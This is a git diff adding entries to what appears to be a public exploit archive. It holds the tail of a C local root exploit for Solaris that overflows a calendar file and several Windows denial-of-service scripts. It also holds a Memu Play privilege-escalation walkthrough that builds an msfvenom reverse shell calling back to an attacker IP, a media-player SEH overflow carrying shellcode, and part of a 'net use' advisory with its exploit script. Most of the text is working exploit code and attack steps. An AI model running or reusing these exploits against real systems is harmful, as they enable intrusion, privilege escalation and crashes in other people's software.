+ add_env("HOME=/tmp");
+ add_env(NULL);
+
+ /* calculate the payload address */
+ payaddr = sb - OFFSET;
+
+ /* prepare the evil palette name */
+ memset(buf, 'A', sizeof(buf));
+ buf[sizeof(buf) - 1] = 0x0;
+
+ /* fill with function address in ld.so.1, saved eip, and arguments */
+ for (i = 0; i < BUFSIZE - 16; i += 4) {
+ set_val(buf, i, ret); /* strcpy */
+ set_val(buf, i += 4, rwx_mem); /* saved eip */
+ set_val(buf, i += 4, rwx_mem); /* 1st argument */
+ set_val(buf, i += 4, payaddr); /* 2nd argument */
+ }
+
+ /* print some output */
+ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+ fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
+ fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+ fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+ fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
+ fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+ /* create the evil calendar file */
+ fprintf(stderr, "Preparing the evil calendar file... ");
+ snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
+ if (system(cmd) == -1) {
+ perror("Error creating calendar file");
+ exit(1);
+ }
+ if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
+ perror("Error creating calendar file");
+ exit(1);
+ }
+
+ /* prepare the evil calendar file (badchars currently not handled) */
+ fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
+ if (!fp) {
+ perror("Error preparing calendar file");
+ exit(1);
+ }
+ fprintf(fp, "Version: 4\n(calendarattributes "
+ "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
+ "\"10:access_list\",\"world:2\")\n");
+ /* buffer overflow in calendar name */
+ fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
+ "\"5:string\",\"%s\")\n", buf);
+ fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
+ "\"6:user\",\"fnord\")\n)");
+ /* buffer overflow in calendar owner */
+ /*
+ fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
+ "\"5:string\",\"hax0r\")\n");
+ fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
+ "\"6:user\",\"%s\")\n)", buf);
+ */
+ fclose(fp);
+
+ fprintf(stderr, "Done.\n");
+
+ /* run the vulnerable program */
+ fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+ if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+ !(addr & 0xff000000)) {
+ fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+ exit(1);
+ }
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+ int addr;
+ void *handle;
+ Link_map *lm;
+
+ /* open the executable object file */
+ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+ perror("dlopen");
+ exit(1);
+ }
+
+ /* get dynamic load information */
+ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+ perror("dlinfo");
+ exit(1);
+ }
+
+ /* search for the address of the symbol */
+ if ((addr = (int)dlsym(handle, sym)) == NULL) {
+ fprintf(stderr, "Sorry, function %s() not found\n", sym);
+ exit(1);
+ }
+
+ /* close the executable object file */
+ dlclose(handle);
+
+ check_zero(addr - 4, sym);
+ return addr;
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+ int fd;
+ char tmp[16];
+ prmap_t map;
+ int addr = 0, addr_old;
+
+ /* open the proc filesystem */
+ sprintf(tmp,"/proc/%d/map", (int)getpid());
+ if ((fd = open(tmp, O_RDONLY)) < 0) {
+ fprintf(stderr, "Can't open %s\n", tmp);
+ exit(1);
+ }
+
+ /* search for the last RWX memory segment before stack (last - 1) */
+ while (read(fd, &map, sizeof(map)))
+ if (map.pr_vaddr)
+ if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+ addr_old = addr;
+ addr = map.pr_vaddr;
+ }
+ close(fd);
+
+ /* add 4 to the exact address NULL bytes */
+ if (!(addr_old & 0xff))
+ addr_old |= 0x04;
+ if (!(addr_old & 0xff00))
+ addr_old |= 0x0400;
+
+ return addr_old;
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+ buf[pos] = (val & 0x000000ff);
+ buf[pos + 1] = (val & 0x0000ff00) >> 8;
+ buf[pos + 2] = (val & 0x00ff0000) >> 16;
+ buf[pos + 3] = (val & 0xff000000) >> 24;
+}
\ No newline at end of file
diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py
new file mode 100755
index 000000000..a91229f95
--- /dev/null
+++ b/exploits/windows/dos/48284.py
@@ -0,0 +1,35 @@
+# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.2.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py
new file mode 100755
index 000000000..12369a016
--- /dev/null
+++ b/exploits/windows/dos/48285.py
@@ -0,0 +1,36 @@
+# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
+# Exploit Author: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: https://www.spotauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested Version: 5.3.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords,
+# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
+# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20
+# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run SpotAuditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py
new file mode 100755
index 000000000..ce265c73f
--- /dev/null
+++ b/exploits/windows/dos/48286.py
@@ -0,0 +1,39 @@
+# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+ f=open("POC.txt","w")
+ print "[+] Creating %s bytes payload.." %len(buff)
+ f.write(buff)
+ f.close()
+ print "[+] POC created!"
+except:
+ print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py
new file mode 100755
index 000000000..01d5a7147
--- /dev/null
+++ b/exploits/windows/dos/48287.py
@@ -0,0 +1,26 @@
+# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
+# Date: 2020-04-05
+# Exploit Author: inter
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Vulnerable Software: Firgate
+# Version: 3.36
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: crash.py
+# 2.- Copy content to clipboard
+# 3.- Open "Frigate3.exe"
+# 4.- Go to "Disk" > Find Computer
+# 5.- Paste ClipBoard into the "Computer Name:" field
+# 6.- Click on OK
+# 7.- Crashed
+
+#Python "crash.py" Code:
+
+buffer = "\x41" * 2000
+f = open ("Frigate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py
new file mode 100755
index 000000000..e0a122ff7
--- /dev/null
+++ b/exploits/windows/dos/48288.py
@@ -0,0 +1,23 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
+#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Repeater host" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py
new file mode 100755
index 000000000..eee1b4ddc
--- /dev/null
+++ b/exploits/windows/dos/48290.py
@@ -0,0 +1,24 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
+#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Password" Paste Clipboard
+#6.- Click on "OK"
+#7.- Click on "Propieties"
+#8.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py
new file mode 100755
index 000000000..f926016a6
--- /dev/null
+++ b/exploits/windows/dos/48291.py
@@ -0,0 +1,22 @@
+# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
+#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt
new file mode 100644
index 000000000..7155a42ed
--- /dev/null
+++ b/exploits/windows/dos/48292.txt
@@ -0,0 +1,22 @@
+# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
+#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files...
+#5.- Select "Private key file:" field erease and Paste ClipBoard
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+buffer = "\x41" * 2000
+f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py
new file mode 100755
index 000000000..1f658e2bd
--- /dev/null
+++ b/exploits/windows/dos/48302.py
@@ -0,0 +1,21 @@
+# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
+# 2.- Open ZOC Terminal
+# 3.- Select Script > Start REXX Script...
+# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
+# 5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('ZOC_7.25.5_Script.zrx', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py
new file mode 100755
index 000000000..0771d435c
--- /dev/null
+++ b/exploits/windows/dos/48305.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-05-02
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
+# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
+# 3.- Open AbsoluteTelnet
+# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
+# 5.- In "username" field paste Clipboard
+# 6.- Select "OK"
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt
new file mode 100644
index 000000000..f6b3529a0
--- /dev/null
+++ b/exploits/windows/local/48283.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
+# Discovery by: chuyreds
+# Discovery Date: 2020-03-08
+# Vendor Homepage: https://www.memuplay.com/
+# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
+# Tested Version: 7.1.3
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Description:
+# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# Local, Low privilege access with restart capabilities
+
+# Details
+# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
+# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
+ BUILTIN\Administradores:(I)(F)
+ BUILTIN\Usuarios:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
+
+Se procesaron correctamente 1 archivos; error al procesar 0 archivos
+
+
+C:\>sc qc MEmuSVC
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: MEmuSVC
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : MEmuSVC
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+ nc -lvp 443
+ service apache2 start
+
+3. Download malicious .exe on victim machine
+ Open browser to http://192.168.1.130/MemuService.exe and download
+
+4. Overwrite file and copy malicious .exe.
+ Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
+ Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py
new file mode 100755
index 000000000..13ca75c29
--- /dev/null
+++ b/exploits/windows/local/48293.py
@@ -0,0 +1,79 @@
+# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
+# Date: 2020-04-04
+# Author: Felipe Winsnes
+# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
+# Version: 8
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file called "poc.m3l".
+# 2.- Open the Application.
+# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
+# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
+# 5.- Select the file "poc.m3l".
+# 6.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
+# Payload size: 512 bytes
+
+buf = b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
+buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
+buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
+buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
+buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
+buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
+buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
+buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
+buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
+buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
+buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
+buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
+buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
+buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
+buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
+buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
+buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
+buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
+buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
+buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
+buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
+buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
+buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
+buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
+buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
+buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
+buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
+buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
+buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
+buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
+buf += b"\x75\x4d\x30\x41\x41"
+
+nseh = "\x71\x41"
+seh = "\x41\x4a"
+
+alignment = ""
+alignment += "\x54\x71" # push ebx, padding
+alignment += "\x58\x71" # pop eax, padding
+alignment += "\x05\x20\x22" # add eax, 0x22002000
+alignment += "\x71" # Padding
+alignment += "\x2D\x19\x22" # sub eax, 0x22001900
+alignment += "\x71" # Padding
+alignment += "\x50\x71" # push eax, padding
+alignment += "\xC3" # retn
+
+buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
+f = open ("poc.m3l", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt
new file mode 100644
index 000000000..654d0b495
--- /dev/null
+++ b/exploits/windows/local/48299.txt
@@ -0,0 +1,313 @@
+# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
+# Date: 2020-04-04
+# Author: hyp3rlinx
+# Vendor: www.microsoft.com
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows "net use" Command
+
+Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
+The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.
+
+
+[Vulnerability Type]
+Insuffient Password Prompt
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
+is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately
+we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to
+has other vulnerabilities present.
+
+In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected.
+The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation.
+Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less.
+
+Requirements:
+1) Remote system built-in Administrator account is enabled
+2) Origination system users account password and the remote system Administrator passwords match (reuse).
+
+Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case.
+Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.
+
+However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails.
+Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.
+
+Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections
+and try them and if theres password reuse (likely) BOOM automagic logon.
+
+This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used.
+When testing make sure to logout then log back in after changing passwords so the environment is clean.
+
+e.g.
+
+1) Passwords for both systems are different and remote built-in Administrator account active:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+
+Enter the password for 'Administrator' to connect to '192.168.x.x':
+System error 5 has occurred.
+
+Access is denied.
+
+2) Passwords for both origination system and remote match:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+The command completed successfully.
+
+By the way as a side note DCERPC calls work as well, if both systems happen to have same password.
+c:\>getmac /s x.x.x.x /U Administrator
+
+MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."
+Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?
+
+Expected result: Consistent password dialog box, no matter if passwords match or not.
+Actual Result: No prompt for a password if both systems passwords are the same.
+
+Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC.
+
+
+[Exploit/POC]
+import os,re,time,signal,sys
+from subprocess import *
+from multiprocessing import Process
+
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#twitter.com/hyp3rlinx
+#-----------------------------------
+#When a remote systems built-in Administrator account is enabled and both the remote and the target system
+#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
+#
+#MountPoints2 and Terminal server client hints in the Windows registry can help us.
+#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
